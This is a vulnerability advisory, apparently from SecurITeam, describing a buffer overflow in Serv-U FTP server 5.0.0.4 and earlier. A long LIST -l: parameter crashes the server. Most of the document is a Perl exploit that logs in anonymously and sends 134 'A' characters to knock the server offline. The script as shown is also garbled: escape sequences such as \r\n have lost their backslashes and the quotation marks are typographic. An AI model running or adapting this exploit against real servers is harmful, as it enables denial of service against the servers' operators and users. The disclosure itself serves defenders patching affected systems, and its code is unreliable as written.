‘Serv-U LIST -l Parameter Buffer Overflow’

Summary

Serv-U is a ‘powerful, easy-to-use, award-winning FTP server’ created by Rob Beckers. A vulnerability in the product allows a remote user to cause the server to fail by sending a malformed LIST command to the server.’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability. ‘


Details

Vulnerable Systems:
 * Serv-U version 5.0.0.4 and prior

Immune Systems:
 * Serv-U 5.0.0.6 and newer

A user issuing a long parameter (around 134 bytes) as a value for a LIST command (using the -l: parameter for that LIST command), can cause the server to try and read a value that is outside the memory location of the Serv-U’s memory, this will cause an exception to be triggered (an unhandled exception), which in turn causes the program to crash.

Exploit:
#!/usr/bin/perl

use IO::Socket;

$host = ‘192.168.1.243’;

$remote = IO::Socket::INET->new ( Proto => ‘tcp’,
     PeerAddr => $host,
     PeerPort => ‘2116’,
    );

unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }

print ‘connectedn’;
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = ‘USER anonymousrn’;

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join(”, ‘PASS ‘, ‘a@b.com’, ‘rn’);
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

my $ftp = join (”, ‘LIST -l:’, ‘A’x(134), ‘rn’);

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;’

Categories: Windows